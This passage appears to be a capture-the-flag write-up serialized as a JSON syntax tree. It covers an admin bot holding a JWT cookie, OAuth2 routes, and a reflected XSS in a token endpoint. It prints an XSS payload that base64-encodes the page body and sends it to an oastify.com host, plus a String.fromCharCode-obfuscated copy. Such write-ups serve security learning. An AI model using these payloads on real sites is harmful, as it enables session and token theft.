",{"type":32,"tag":78,"props":2402,"children":2403},{"style":471},[2404],{"type":37,"value":624},{"type":32,"tag":78,"props":2406,"children":2407},{"style":607},[2408],{"type":37,"value":2409}," Options",{"type":32,"tag":78,"props":2411,"children":2412},{"style":471},[2413],{"type":37,"value":1170},{"type":32,"tag":78,"props":2415,"children":2416},{"class":80,"line":99},[2417,2422,2426],{"type":32,"tag":78,"props":2418,"children":2419},{"style":471},[2420],{"type":37,"value":2421}," [",{"type":32,"tag":78,"props":2423,"children":2424},{"style":593},[2425],{"type":37,"value":596},{"type":32,"tag":78,"props":2427,"children":2428},{"style":471},[2429],{"type":37,"value":601},{"type":32,"tag":78,"props":2431,"children":2432},{"class":80,"line":108},[2433,2438,2442,2447,2451,2456,2460,2465,2469,2474],{"type":32,"tag":78,"props":2434,"children":2435},{"style":607},[2436],{"type":37,"value":2437},"    client ",{"type":32,"tag":78,"props":2439,"children":2440},{"style":471},[2441],{"type":37,"value":624},{"type":32,"tag":78,"props":2443,"children":2444},{"style":607},[2445],{"type":37,"value":2446}," webdriver",{"type":32,"tag":78,"props":2448,"children":2449},{"style":471},[2450],{"type":37,"value":485},{"type":32,"tag":78,"props":2452,"children":2453},{"style":607},[2454],{"type":37,"value":2455},"Chrome",{"type":32,"tag":78,"props":2457,"children":2458},{"style":471},[2459],{"type":37,"value":495},{"type":32,"tag":78,"props":2461,"children":2462},{"style":519},[2463],{"type":37,"value":2464},"options",{"type":32,"tag":78,"props":2466,"children":2467},{"style":471},[2468],{"type":37,"value":624},{"type":32,"tag":78,"props":2470,"children":2471},{"style":607},[2472],{"type":37,"value":2473},"chrome_options",{"type":32,"tag":78,"props":2475,"children":2476},{"style":471},[2477],{"type":37,"value":722},{"type":32,"tag":78,"props":2479,"children":2480},{"class":80,"line":117},[2481,2486,2490,2495,2499,2503,2508,2512],{"type":32,"tag":78,"props":2482,"children":2483},{"style":607},[2484],{"type":37,"value":2485},"    client",{"type":32,"tag":78,"props":2487,"children":2488},{"style":471},[2489],{"type":37,"value":485},{"type":32,"tag":78,"props":2491,"children":2492},{"style":607},[2493],{"type":37,"value":2494},"get",{"type":32,"tag":78,"props":2496,"children":2497},{"style":471},[2498],{"type":37,"value":495},{"type":32,"tag":78,"props":2500,"children":2501},{"style":498},[2502],{"type":37,"value":501},{"type":32,"tag":78,"props":2504,"children":2505},{"style":504},[2506],{"type":37,"value":2507},"http://127.0.0.1:5000",{"type":32,"tag":78,"props":2509,"children":2510},{"style":498},[2511],{"type":37,"value":501},{"type":32,"tag":78,"props":2513,"children":2514},{"style":471},[2515],{"type":37,"value":722},{"type":32,"tag":78,"props":2517,"children":2518},{"class":80,"line":126},[2519],{"type":32,"tag":78,"props":2520,"children":2521},{"emptyLinePlaceholder":157},[2522],{"type":37,"value":160},{"type":32,"tag":78,"props":2524,"children":2525},{"class":80,"line":135},[2526,2531,2535,2540,2544,2549,2553,2557,2562,2566],{"type":32,"tag":78,"props":2527,"children":2528},{"style":607},[2529],{"type":37,"value":2530},"    token ",{"type":32,"tag":78,"props":2532,"children":2533},{"style":471},[2534],{"type":37,"value":624},{"type":32,"tag":78,"props":2536,"children":2537},{"style":607},[2538],{"type":37,"value":2539}," create_jwt",{"type":32,"tag":78,"props":2541,"children":2542},{"style":471},[2543],{"type":37,"value":495},{"type":32,"tag":78,"props":2545,"children":2546},{"style":918},[2547],{"type":37,"value":2548},"1",{"type":32,"tag":78,"props":2550,"children":2551},{"style":471},[2552],{"type":37,"value":516},{"type":32,"tag":78,"props":2554,"children":2555},{"style":498},[2556],{"type":37,"value":549},{"type":32,"tag":78,"props":2558,"children":2559},{"style":504},[2560],{"type":37,"value":2561},"administrator",{"type":32,"tag":78,"props":2563,"children":2564},{"style":498},[2565],{"type":37,"value":501},{"type":32,"tag":78,"props":2567,"children":2568},{"style":471},[2569],{"type":37,"value":722},{"type":32,"tag":78,"props":2571,"children":2572},{"class":80,"line":144},[2573,2578,2582],{"type":32,"tag":78,"props":2574,"children":2575},{"style":607},[2576],{"type":37,"value":2577},"    cookie ",{"type":32,"tag":78,"props":2579,"children":2580},{"style":471},[2581],{"type":37,"value":624},{"type":32,"tag":78,"props":2583,"children":2584},{"style":471},[2585],{"type":37,"value":2586}," {\n",{"type":32,"tag":78,"props":2588,"children":2589},{"class":80,"line":153},[2590,2595,2600,2604,2608,2612,2617,2621],{"type":32,"tag":78,"props":2591,"children":2592},{"style":498},[2593],{"type":37,"value":2594},"        \"",{"type":32,"tag":78,"props":2596,"children":2597},{"style":504},[2598],{"type":37,"value":2599},"name",{"type":32,"tag":78,"props":2601,"children":2602},{"style":498},[2603],{"type":37,"value":501},{"type":32,"tag":78,"props":2605,"children":2606},{"style":471},[2607],{"type":37,"value":1106},{"type":32,"tag":78,"props":2609,"children":2610},{"style":498},[2611],{"type":37,"value":549},{"type":32,"tag":78,"props":2613,"children":2614},{"style":504},[2615],{"type":37,"value":2616},"token",{"type":32,"tag":78,"props":2618,"children":2619},{"style":498},[2620],{"type":37,"value":501},{"type":32,"tag":78,"props":2622,"children":2623},{"style":471},[2624],{"type":37,"value":2625},",\n",{"type":32,"tag":78,"props":2627,"children":2628},{"class":80,"line":163},[2629,2633,2638,2642,2646,2651],{"type":32,"tag":78,"props":2630,"children":2631},{"style":498},[2632],{"type":37,"value":2594},{"type":32,"tag":78,"props":2634,"children":2635},{"style":504},[2636],{"type":37,"value":2637},"value",{"type":32,"tag":78,"props":2639,"children":2640},{"style":498},[2641],{"type":37,"value":501},{"type":32,"tag":78,"props":2643,"children":2644},{"style":471},[2645],{"type":37,"value":1106},{"type":32,"tag":78,"props":2647,"children":2648},{"style":607},[2649],{"type":37,"value":2650}," token",{"type":32,"tag":78,"props":2652,"children":2653},{"style":471},[2654],{"type":37,"value":2625},{"type":32,"tag":78,"props":2656,"children":2657},{"class":80,"line":172},[2658,2662,2667,2671,2675,2679,2684,2688],{"type":32,"tag":78,"props":2659,"children":2660},{"style":498},[2661],{"type":37,"value":2594},{"type":32,"tag":78,"props":2663,"children":2664},{"style":504},[2665],{"type":37,"value":2666},"domain",{"type":32,"tag":78,"props":2668,"children":2669},{"style":498},[2670],{"type":37,"value":501},{"type":32,"tag":78,"props":2672,"children":2673},{"style":471},[2674],{"type":37,"value":1106},{"type":32,"tag":78,"props":2676,"children":2677},{"style":498},[2678],{"type":37,"value":549},{"type":32,"tag":78,"props":2680,"children":2681},{"style":504},[2682],{"type":37,"value":2683},"127.0.0.1",{"type":32,"tag":78,"props":2685,"children":2686},{"style":498},[2687],{"type":37,"value":501},{"type":32,"tag":78,"props":2689,"children":2690},{"style":471},[2691],{"type":37,"value":2625},{"type":32,"tag":78,"props":2693,"children":2694},{"class":80,"line":181},[2695,2699,2704,2708,2712,2716,2721,2725],{"type":32,"tag":78,"props":2696,"children":2697},{"style":498},[2698],{"type":37,"value":2594},{"type":32,"tag":78,"props":2700,"children":2701},{"style":504},[2702],{"type":37,"value":2703},"path",{"type":32,"tag":78,"props":2705,"children":2706},{"style":498},[2707],{"type":37,"value":501},{"type":32,"tag":78,"props":2709,"children":2710},{"style":471},[2711],{"type":37,"value":1106},{"type":32,"tag":78,"props":2713,"children":2714},{"style":498},[2715],{"type":37,"value":549},{"type":32,"tag":78,"props":2717,"children":2718},{"style":504},[2719],{"type":37,"value":2720},"/",{"type":32,"tag":78,"props":2722,"children":2723},{"style":498},[2724],{"type":37,"value":501},{"type":32,"tag":78,"props":2726,"children":2727},{"style":471},[2728],{"type":37,"value":2625},{"type":32,"tag":78,"props":2730,"children":2731},{"class":80,"line":190},[2732,2736,2741,2745,2749,2754,2758,2762,2766,2770,2774,2778,2783,2788,2792,2796,2801,2805,2810,2814,2819,2824,2829],{"type":32,"tag":78,"props":2733,"children":2734},{"style":498},[2735],{"type":37,"value":2594},{"type":32,"tag":78,"props":2737,"children":2738},{"style":504},[2739],{"type":37,"value":2740},"expiry",{"type":32,"tag":78,"props":2742,"children":2743},{"style":498},[2744],{"type":37,"value":501},{"type":32,"tag":78,"props":2746,"children":2747},{"style":471},[2748],{"type":37,"value":1106},{"type":32,"tag":78,"props":2750,"children":2751},{"style":1257},[2752],{"type":37,"value":2753}," int",{"type":32,"tag":78,"props":2755,"children":2756},{"style":471},[2757],{"type":37,"value":1747},{"type":32,"tag":78,"props":2759,"children":2760},{"style":607},[2761],{"type":37,"value":2145},{"type":32,"tag":78,"props":2763,"children":2764},{"style":471},[2765],{"type":37,"value":485},{"type":32,"tag":78,"props":2767,"children":2768},{"style":607},[2769],{"type":37,"value":2145},{"type":32,"tag":78,"props":2771,"children":2772},{"style":471},[2773],{"type":37,"value":485},{"type":32,"tag":78,"props":2775,"children":2776},{"style":607},[2777],{"type":37,"value":2154},{"type":32,"tag":78,"props":2779,"children":2780},{"style":471},[2781],{"type":37,"value":2782},"()",{"type":32,"tag":78,"props":2784,"children":2785},{"style":569},[2786],{"type":37,"value":2787}," +",{"type":32,"tag":78,"props":2789,"children":2790},{"style":607},[2791],{"type":37,"value":2136},{"type":32,"tag":78,"props":2793,"children":2794},{"style":471},[2795],{"type":37,"value":485},{"type":32,"tag":78,"props":2797,"children":2798},{"style":607},[2799],{"type":37,"value":2800},"timedelta",{"type":32,"tag":78,"props":2802,"children":2803},{"style":471},[2804],{"type":37,"value":495},{"type":32,"tag":78,"props":2806,"children":2807},{"style":519},[2808],{"type":37,"value":2809},"seconds",{"type":32,"tag":78,"props":2811,"children":2812},{"style":471},[2813],{"type":37,"value":624},{"type":32,"tag":78,"props":2815,"children":2816},{"style":918},[2817],{"type":37,"value":2818},"1800",{"type":32,"tag":78,"props":2820,"children":2821},{"style":471},[2822],{"type":37,"value":2823},")).",{"type":32,"tag":78,"props":2825,"children":2826},{"style":607},[2827],{"type":37,"value":2828},"timestamp",{"type":32,"tag":78,"props":2830,"children":2831},{"style":471},[2832],{"type":37,"value":2833},"()),\n",{"type":32,"tag":78,"props":2835,"children":2836},{"class":80,"line":199},[2837,2841,2846,2850,2854,2858],{"type":32,"tag":78,"props":2838,"children":2839},{"style":498},[2840],{"type":37,"value":2594},{"type":32,"tag":78,"props":2842,"children":2843},{"style":504},[2844],{"type":37,"value":2845},"secure",{"type":32,"tag":78,"props":2847,"children":2848},{"style":498},[2849],{"type":37,"value":501},{"type":32,"tag":78,"props":2851,"children":2852},{"style":471},[2853],{"type":37,"value":1106},{"type":32,"tag":78,"props":2855,"children":2856},{"style":833},[2857],{"type":37,"value":1136},{"type":32,"tag":78,"props":2859,"children":2860},{"style":471},[2861],{"type":37,"value":2625},{"type":32,"tag":78,"props":2863,"children":2864},{"class":80,"line":207},[2865,2869,2874,2878,2882],{"type":32,"tag":78,"props":2866,"children":2867},{"style":498},[2868],{"type":37,"value":2594},{"type":32,"tag":78,"props":2870,"children":2871},{"style":504},[2872],{"type":37,"value":2873},"httpOnly",{"type":32,"tag":78,"props":2875,"children":2876},{"style":498},[2877],{"type":37,"value":501},{"type":32,"tag":78,"props":2879,"children":2880},{"style":471},[2881],{"type":37,"value":1106},{"type":32,"tag":78,"props":2883,"children":2884},{"style":833},[2885],{"type":37,"value":2886}," True\n",{"type":32,"tag":78,"props":2888,"children":2889},{"class":80,"line":215},[2890],{"type":32,"tag":78,"props":2891,"children":2892},{"style":471},[2893],{"type":37,"value":247},{"type":32,"tag":78,"props":2895,"children":2896},{"class":80,"line":224},[2897,2901,2905,2910,2914,2919],{"type":32,"tag":78,"props":2898,"children":2899},{"style":607},[2900],{"type":37,"value":2485},{"type":32,"tag":78,"props":2902,"children":2903},{"style":471},[2904],{"type":37,"value":485},{"type":32,"tag":78,"props":2906,"children":2907},{"style":607},[2908],{"type":37,"value":2909},"add_cookie",{"type":32,"tag":78,"props":2911,"children":2912},{"style":471},[2913],{"type":37,"value":495},{"type":32,"tag":78,"props":2915,"children":2916},{"style":607},[2917],{"type":37,"value":2918},"cookie",{"type":32,"tag":78,"props":2920,"children":2921},{"style":471},[2922],{"type":37,"value":722},{"type":32,"tag":78,"props":2924,"children":2925},{"class":80,"line":233},[2926],{"type":32,"tag":78,"props":2927,"children":2928},{"emptyLinePlaceholder":157},[2929],{"type":37,"value":160},{"type":32,"tag":78,"props":2931,"children":2932},{"class":80,"line":241},[2933,2937,2941,2945,2949,2953,2957,2961,2965,2970,2974],{"type":32,"tag":78,"props":2934,"children":2935},{"style":607},[2936],{"type":37,"value":2485},{"type":32,"tag":78,"props":2938,"children":2939},{"style":471},[2940],{"type":37,"value":485},{"type":32,"tag":78,"props":2942,"children":2943},{"style":607},[2944],{"type":37,"value":2494},{"type":32,"tag":78,"props":2946,"children":2947},{"style":471},[2948],{"type":37,"value":495},{"type":32,"tag":78,"props":2950,"children":2951},{"style":498},[2952],{"type":37,"value":501},{"type":32,"tag":78,"props":2954,"children":2955},{"style":504},[2956],{"type":37,"value":2507},{"type":32,"tag":78,"props":2958,"children":2959},{"style":498},[2960],{"type":37,"value":501},{"type":32,"tag":78,"props":2962,"children":2963},{"style":569},[2964],{"type":37,"value":2787},{"type":32,"tag":78,"props":2966,"children":2967},{"style":607},[2968],{"type":37,"value":2969}," link",{"type":32,"tag":78,"props":2971,"children":2972},{"style":471},[2973],{"type":37,"value":670},{"type":32,"tag":78,"props":2975,"children":2976},{"style":673},[2977],{"type":37,"value":2978}," # \u003C--- Here is the open redirect\n",{"type":32,"tag":78,"props":2980,"children":2981},{"class":80,"line":250},[2982,2987,2991,2996,3000,3005],{"type":32,"tag":78,"props":2983,"children":2984},{"style":607},[2985],{"type":37,"value":2986},"    time",{"type":32,"tag":78,"props":2988,"children":2989},{"style":471},[2990],{"type":37,"value":485},{"type":32,"tag":78,"props":2992,"children":2993},{"style":607},[2994],{"type":37,"value":2995},"sleep",{"type":32,"tag":78,"props":2997,"children":2998},{"style":471},[2999],{"type":37,"value":495},{"type":32,"tag":78,"props":3001,"children":3002},{"style":918},[3003],{"type":37,"value":3004},"10",{"type":32,"tag":78,"props":3006,"children":3007},{"style":471},[3008],{"type":37,"value":722},{"type":32,"tag":78,"props":3010,"children":3012},{"class":80,"line":3011},21,[3013,3017,3021,3026],{"type":32,"tag":78,"props":3014,"children":3015},{"style":607},[3016],{"type":37,"value":2485},{"type":32,"tag":78,"props":3018,"children":3019},{"style":471},[3020],{"type":37,"value":485},{"type":32,"tag":78,"props":3022,"children":3023},{"style":607},[3024],{"type":37,"value":3025},"quit",{"type":32,"tag":78,"props":3027,"children":3028},{"style":471},[3029],{"type":37,"value":1170},{"type":32,"tag":46,"props":3031,"children":3032},{},[3033],{"type":37,"value":3034},"Furthermore, it is important to note that this bot have an administrator token in their cookie. However, this token can only be used on the service of port 3000. We need to find a way to have a valid token on port 4000. This is what we will detail in the next chapter.",{"type":32,"tag":39,"props":3036,"children":3038},{"id":3037},"oauth2-into-xss",[3039],{"type":37,"value":3040},"Oauth2 into XSS",{"type":32,"tag":46,"props":3042,"children":3043},{},[3044,3046,3052],{"type":37,"value":3045},"The routes of the port service 4000 are only accessible via the header ",{"type":32,"tag":74,"props":3047,"children":3049},{"className":3048},[],[3050],{"type":37,"value":3051},"Authorization: Bearer \u003CJWT>",{"type":37,"value":3053},". The JWT must be generated beforehand using the oauth2 functionality located on port 3000.",{"type":32,"tag":46,"props":3055,"children":3056},{},[3057],{"type":37,"value":3058},"We will detail these routes below:",{"type":32,"tag":290,"props":3060,"children":3061},{},[3062],{"type":32,"tag":294,"props":3063,"children":3064},{},[3065,3071,3072,3076,3082,3084,3087,3092,3094,3097,3102],{"type":32,"tag":74,"props":3066,"children":3068},{"className":3067},[],[3069],{"type":37,"value":3070},"/oauth2/auth",{"type":37,"value":1106},{"type":32,"tag":3073,"props":3074,"children":3075},"br",{},[],{"type":32,"tag":3077,"props":3078,"children":3079},"em",{},[3080],{"type":37,"value":3081},"Method",{"type":37,"value":3083},": GET",{"type":32,"tag":3073,"props":3085,"children":3086},{},[],{"type":32,"tag":3077,"props":3088,"children":3089},{},[3090],{"type":37,"value":3091},"Parameters",{"type":37,"value":3093},": client_id, redirect_url",{"type":32,"tag":3073,"props":3095,"children":3096},{},[],{"type":32,"tag":3077,"props":3098,"children":3099},{},[3100],{"type":37,"value":3101},"Description",{"type":37,"value":3103},": This route generates an OAuth2 authorization page using the \"oauth2.html\" template. It passes in the title, client_id, and redirect_url as variables to the template. This page is likely where the user would enter their credentials to authorize the OAuth2 request.",{"type":32,"tag":33,"props":3105,"children":3106},{"id":7},[],{"type":32,"tag":290,"props":3108,"children":3109},{},[3110],{"type":32,"tag":294,"props":3111,"children":3112},{},[3113,3119,3120,3123,3127,3128,3131,3135,3136,3139,3143],{"type":32,"tag":74,"props":3114,"children":3116},{"className":3115},[],[3117],{"type":37,"value":3118},"oauth2/code",{"type":37,"value":1106},{"type":32,"tag":3073,"props":3121,"children":3122},{},[],{"type":32,"tag":3077,"props":3124,"children":3125},{},[3126],{"type":37,"value":3081},{"type":37,"value":3083},{"type":32,"tag":3073,"props":3129,"children":3130},{},[],{"type":32,"tag":3077,"props":3132,"children":3133},{},[3134],{"type":37,"value":3091},{"type":37,"value":3093},{"type":32,"tag":3073,"props":3137,"children":3138},{},[],{"type":32,"tag":3077,"props":3140,"children":3141},{},[3142],{"type":37,"value":3101},{"type":37,"value":3144},": This route constructs a URL containing the authorization code as a query parameter and redirects the user to this URL using a 303 status code. This is typically the URL of the client application that initiated the OAuth2 request. The client application can then use this authorization code to request an access token from the server.",{"type":32,"tag":33,"props":3146,"children":3148},{"id":3147},"_1",[],{"type":32,"tag":290,"props":3150,"children":3151},{},[3152],{"type":32,"tag":294,"props":3153,"children":3154},{},[3155,3161,3162,3165,3169,3170,3173,3177,3179,3182,3186,3188,3192,3195,3200],{"type":32,"tag":74,"props":3156,"children":3158},{"className":3157},[],[3159],{"type":37,"value":3160},"/oauth2/token",{"type":37,"value":1106},{"type":32,"tag":3073,"props":3163,"children":3164},{},[],{"type":32,"tag":3077,"props":3166,"children":3167},{},[3168],{"type":37,"value":3081},{"type":37,"value":3083},{"type":32,"tag":3073,"props":3171,"children":3172},{},[],{"type":32,"tag":3077,"props":3174,"children":3175},{},[3176],{"type":37,"value":3091},{"type":37,"value":3178},": client_id, redirect_url, authorization_code",{"type":32,"tag":3073,"props":3180,"children":3181},{},[],{"type":32,"tag":3077,"props":3183,"children":3184},{},[3185],{"type":37,"value":3101},{"type":37,"value":3187},": This route check the validity of the provided authorization code. It retrieves the associated record from the database, verifies the client_id and redirect_url, and checks if the authorization code has expired. If the authorization code is valid, it generates an access token and returns it to the client.",{"type":32,"tag":33,"props":3189,"children":3191},{"id":3190},"_2",[],{"type":32,"tag":3073,"props":3193,"children":3194},{},[],{"type":32,"tag":284,"props":3196,"children":3197},{},[3198],{"type":37,"value":3199},"Note: The client_id and redirect_url parameters need to match the values used to generate the authorization code.",{"type":32,"tag":33,"props":3201,"children":3203},{"id":3202},"_3",[],{"type":32,"tag":46,"props":3205,"children":3206},{},[3207,3209,3215,3217,3222],{"type":37,"value":3208},"If we recap, the routes that interest us are the last two. The flow that allows us to obtain a token for the service 4000 is as follows: we call the ",{"type":32,"tag":74,"props":3210,"children":3212},{"className":3211},[],[3213],{"type":37,"value":3214},"/oauth2/code",{"type":37,"value":3216}," route to initialize the oauth2 request, this route return a 303 with authorization code as a query parameter. Then we call the ",{"type":32,"tag":74,"props":3218,"children":3220},{"className":3219},[],[3221],{"type":37,"value":3160},{"type":37,"value":3223}," route with the authorization code to obtain a valid token.",{"type":32,"tag":46,"props":3225,"children":3226},{},[3227],{"type":37,"value":3228},"oauth2/code:",{"type":32,"tag":52,"props":3230,"children":3232},{"imgSrc":3231},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313648/writeups/phantom-feed/oauth2_code.webp",[],{"type":32,"tag":46,"props":3234,"children":3235},{},[3236],{"type":37,"value":3237},"oauth2/token:",{"type":32,"tag":52,"props":3239,"children":3241},{"imgSrc":3240},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313664/writeups/phantom-feed/oauth2_token.webp",[],{"type":32,"tag":46,"props":3243,"children":3244},{},[3245,3247,3253,3255,3261],{"type":37,"value":3246},"If we carefully examine the headers of the last request, we can see that the content type is: ",{"type":32,"tag":74,"props":3248,"children":3250},{"className":3249},[],[3251],{"type":37,"value":3252},"text/html",{"type":37,"value":3254},". Furthermore, the ",{"type":32,"tag":74,"props":3256,"children":3258},{"className":3257},[],[3259],{"type":37,"value":3260},"redirect_url",{"type":37,"value":3262}," is a parameter that we control and we can see that it is reflected in the response, indicating that this endpoint is vulnerable to XSS.",{"type":32,"tag":52,"props":3264,"children":3266},{"imgSrc":3265},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313866/writeups/phantom-feed/content_type_response_token.webp",[],{"type":32,"tag":46,"props":3268,"children":3269},{},[3270],{"type":37,"value":3271},"In our case, it would be interesting to manipulate the bot by using an open redirect to force it to utilize this OAuth2 flow. By exploiting the XSS vulnerability when the token is generated and obtaining the HTML body, we can steal the admin token that is usable in the service at port 4000.",{"type":32,"tag":46,"props":3273,"children":3274},{},[3275],{"type":37,"value":3276},"To do this, we will use the following XSS payload to steal the body of the HTML:",{"type":32,"tag":63,"props":3278,"children":3280},{"lang":3279},"html",[3281],{"type":32,"tag":68,"props":3282,"children":3285},{"className":3283,"code":3284,"language":3279,"meta":7,"style":7},"language-html shiki shiki-themes vitesse-dark","\u003Cimg src=x onerror='window.location = `http://lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`'>\n",[3286],{"type":32,"tag":74,"props":3287,"children":3288},{"__ignoreMap":7},[3289],{"type":32,"tag":78,"props":3290,"children":3291},{"class":80,"line":81},[3292,3297,3302,3307,3311,3316,3321,3325,3330,3335,3339,3344,3348,3353,3358,3363,3367],{"type":32,"tag":78,"props":3293,"children":3294},{"style":471},[3295],{"type":37,"value":3296},"\u003C",{"type":32,"tag":78,"props":3298,"children":3299},{"style":833},[3300],{"type":37,"value":3301},"img",{"type":32,"tag":78,"props":3303,"children":3304},{"style":519},[3305],{"type":37,"value":3306}," src",{"type":32,"tag":78,"props":3308,"children":3309},{"style":471},[3310],{"type":37,"value":624},{"type":32,"tag":78,"props":3312,"children":3313},{"style":504},[3314],{"type":37,"value":3315},"x",{"type":32,"tag":78,"props":3317,"children":3318},{"style":519},[3319],{"type":37,"value":3320}," onerror",{"type":32,"tag":78,"props":3322,"children":3323},{"style":471},[3324],{"type":37,"value":624},{"type":32,"tag":78,"props":3326,"children":3327},{"style":498},[3328],{"type":37,"value":3329},"'",{"type":32,"tag":78,"props":3331,"children":3332},{"style":504},[3333],{"type":37,"value":3334},"window",{"type":32,"tag":78,"props":3336,"children":3337},{"style":471},[3338],{"type":37,"value":485},{"type":32,"tag":78,"props":3340,"children":3341},{"style":504},[3342],{"type":37,"value":3343},"location ",{"type":32,"tag":78,"props":3345,"children":3346},{"style":471},[3347],{"type":37,"value":624},{"type":32,"tag":78,"props":3349,"children":3350},{"style":498},[3351],{"type":37,"value":3352}," `",{"type":32,"tag":78,"props":3354,"children":3355},{"style":504},[3356],{"type":37,"value":3357},"http:",{"type":32,"tag":78,"props":3359,"children":3360},{"style":673},[3361],{"type":37,"value":3362},"//lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`",{"type":32,"tag":78,"props":3364,"children":3365},{"style":498},[3366],{"type":37,"value":3329},{"type":32,"tag":78,"props":3368,"children":3369},{"style":471},[3370],{"type":37,"value":3371},">\n",{"type":32,"tag":46,"props":3373,"children":3374},{},[3375],{"type":37,"value":3376},"To ensure that the script is executed correctly, we will encode our payload with String.fromCharCode.",{"type":32,"tag":63,"props":3378,"children":3379},{"lang":3279},[3380],{"type":32,"tag":68,"props":3381,"children":3383},{"className":3283,"code":3382,"language":3279,"meta":7,"style":7},"\u003Cimg src=x onerror='eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,96,104,116,116,112,58,47,47,108,99,49,97,122,118,52,110,101,57,119,119,120,110,109,102,120,50,98,122,119,54,122,100,106,52,112,50,100,116,49,105,46,111,97,115,116,105,102,121,46,99,111,109,47,63,98,111,100,121,61,36,123,98,116,111,97,40,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,41,125,96))'>\n",[3384],{"type":32,"tag":74,"props":3385,"children":3386},{"__ignoreMap":7},[3387],{"type":32,"tag":78,"props":3388,"children":3389},{"class":80,"line":81},[3390,3394,3398,3402,3406,3410,3414,3418,3422,3427,3431,3435,3439,3444,3448,3453,3457,3462,3466,3471,3475,3480,3484,3489,3493,3497,3501,3506,3510,3515,3519,3523,3527,3532,3536,3541,3545,3550,3554,3558,3562,3566,3570,3574,3578,3583,3587,3592,3596,3600,3604,3609,3613,3618,3622,3626,3630,3634,3638,3643,3647,3652,3656,3661,3665,3669,3673,3677,3681,3685,3689,3694,3698,3702,3706,3711,3715,3720,3724,3729,3733,3737,3741,3746,3750,3755,3759,3763,3767,3771,3775,3780,3784,3788,3792,3797,3801,3806,3810,3814,3818,3823,3827,3832,3836,3840,3844,3848,3852,3857,3861,3865,3869,3873,3877,3882,3886,3890,3894,3898,3902,3906,3910,3914,3918,3922,3926,3930,3934,3938,3942,3946,3950,3954,3958,3962,3966,3971,3975,3979,3983,3987,3991,3995,3999,4004,4008,4012,4016,4020,4024,4028,4032,4036,4040,4044,4048,4053,4057,4061,4065,4069,4073,4077,4081,4085,4089,4093,4097,4102,4106,4111,4115,4119,4123,4127,4131,4135,4139,4143,4147,4152,4156,4160,4164,4168,4172,4176,4180,4185,4189,4193,4197,4201,4205,4209,4213,4217,4221,4225,4229,4233,4237,4241,4245,4249,4253,4257,4261,4265,4269,4273,4277,4281,4285,4289,4293,4297,4301,4306,4310,4315,4319,4324,4328,4333,4337,4342,4346,4351,4355,4360,4364,4368,4373,4377],{"type":32,"tag":78,"props":3391,"children":3392},{"style":471},[3393],{"type":37,"value":3296},{"type":32,"tag":78,"props":3395,"children":3396},{"style":833},[3397],{"type":37,"value":3301},{"type":32,"tag":78,"props":3399,"children":3400},{"style":519},[3401],{"type":37,"value":3306},{"type":32,"tag":78,"props":3403,"children":3404},{"style":471},[3405],{"type":37,"value":624},{"type":32,"tag":78,"props":3407,"children":3408},{"style":504},[3409],{"type":37,"value":3315},{"type":32,"tag":78,"props":3411,"children":3412},{"style":519},[3413],{"type":37,"value":3320},{"type":32,"tag":78,"props":3415,"children":3416},{"style":471},[3417],{"type":37,"value":624},{"type":32,"tag":78,"props":3419,"children":3420},{"style":498},[3421],{"type":37,"value":3329},{"type":32,"tag":78,"props":3423,"children":3424},{"style":477},[3425],{"type":37,"value":3426},"eval",{"type":32,"tag":78,"props":3428,"children":3429},{"style":471},[3430],{"type":37,"value":495},{"type":32,"tag":78,"props":3432,"children":3433},{"style":504},[3434],{"type":37,"value":1325},{"type":32,"tag":78,"props":3436,"children":3437},{"style":471},[3438],{"type":37,"value":485},{"type":32,"tag":78,"props":3440,"children":3441},{"style":477},[3442],{"type":37,"value":3443},"fromCharCode",{"type":32,"tag":78,"props":3445,"children":3446},{"style":471},[3447],{"type":37,"value":495},{"type":32,"tag":78,"props":3449,"children":3450},{"style":918},[3451],{"type":37,"value":3452},"119",{"type":32,"tag":78,"props":3454,"children":3455},{"style":471},[3456],{"type":37,"value":516},{"type":32,"tag":78,"props":3458,"children":3459},{"style":918},[3460],{"type":37,"value":3461},"105",{"type":32,"tag":78,"props":3463,"children":3464},{"style":471},[3465],{"type":37,"value":516},{"type":32,"tag":78,"props":3467,"children":3468},{"style":918},[3469],{"type":37,"value":3470},"110",{"type":32,"tag":78,"props":3472,"children":3473},{"style":471},[3474],{"type":37,"value":516},{"type":32,"tag":78,"props":3476,"children":3477},{"style":918},[3478],{"type":37,"value":3479},"100",{"type":32,"tag":78,"props":3481,"children":3482},{"style":471},[3483],{"type":37,"value":516},{"type":32,"tag":78,"props":3485,"children":3486},{"style":918},[3487],{"type":37,"value":3488},"111",{"type":32,"tag":78,"props":3490,"children":3491},{"style":471},[3492],{"type":37,"value":516},{"type":32,"tag":78,"props":3494,"children":3495},{"style":918},[3496],{"type":37,"value":3452},{"type":32,"tag":78,"props":3498,"children":3499},{"style":471},[3500],{"type":37,"value":516},{"type":32,"tag":78,"props":3502,"children":3503},{"style":918},[3504],{"type":37,"value":3505},"46",{"type":32,"tag":78,"props":3507,"children":3508},{"style":471},[3509],{"type":37,"value":516},{"type":32,"tag":78,"props":3511,"children":3512},{"style":918},[3513],{"type":37,"value":3514},"108",{"type":32,"tag":78,"props":3516,"children":3517},{"style":471},[3518],{"type":37,"value":516},{"type":32,"tag":78,"props":3520,"children":3521},{"style":918},[3522],{"type":37,"value":3488},{"type":32,"tag":78,"props":3524,"children":3525},{"style":471},[3526],{"type":37,"value":516},{"type":32,"tag":78,"props":3528,"children":3529},{"style":918},[3530],{"type":37,"value":3531},"99",{"type":32,"tag":78,"props":3533,"children":3534},{"style":471},[3535],{"type":37,"value":516},{"type":32,"tag":78,"props":3537,"children":3538},{"style":918},[3539],{"type":37,"value":3540},"97",{"type":32,"tag":78,"props":3542,"children":3543},{"style":471},[3544],{"type":37,"value":516},{"type":32,"tag":78,"props":3546,"children":3547},{"style":918},[3548],{"type":37,"value":3549},"116",{"type":32,"tag":78,"props":3551,"children":3552},{"style":471},[3553],{"type":37,"value":516},{"type":32,"tag":78,"props":3555,"children":3556},{"style":918},[3557],{"type":37,"value":3461},{"type":32,"tag":78,"props":3559,"children":3560},{"style":471},[3561],{"type":37,"value":516},{"type":32,"tag":78,"props":3563,"children":3564},{"style":918},[3565],{"type":37,"value":3488},{"type":32,"tag"